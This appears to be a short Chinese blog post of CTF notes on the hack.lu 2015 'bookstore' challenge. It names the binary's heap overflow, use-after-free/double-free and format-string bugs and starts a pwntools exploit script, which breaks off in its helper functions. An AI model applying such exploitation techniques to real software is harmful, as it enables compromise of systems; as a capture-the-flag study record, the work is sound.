记一下 hack.lu 2015 bookstore 的思路，怕忘

原创

于 2019-07-21 11:44:15 发布 · 620 阅读

CC 4.0 BY-SA版权

这篇博客记录了hack.lu 2015年bookstore挑战的解决方案，重点在于payload的设计。文章提到了两个关键问题：Edit order功能未检查输入长度，可能导致缓冲区溢出；Delete order执行free操作后未清空指针，可能引发double free。博主还提到存在格式化字符串漏洞，并表达了对某些技术细节的困惑。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

网络上两篇非常优秀的大佬的详细过程
https://blog.youkuaiyun.com/qq_43449190/article/details/89077783
https://bbs.pediy.com/thread-246783.htm

仅记payload

该文件有五个函数：

Edit order 1
Edit order 2
Delete order 1
Delete order 2
Submit

其中，Edit order对之前申请的空间进行输入，但是没检查长度

Delete order对之前申请的空间执行free操作，但是没有把指针清空

最后还有一个 printf(dst) 专门构造了一个格式化字符串漏洞

#coding:utf-8
from pwn import *


context(arch='amd64',os='linux')
context.log_level = 'debug'
io = process("./books")
p = ELF("./books")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")


def edit(index,content):
    io.recvuntil("Submit\n")
    io.sendline(str(index))
    io.recvuntil("order:\n")
    io.sendline(content)
    
def delete(index):
    io.recvuntil("Submit\n")
    io.sendline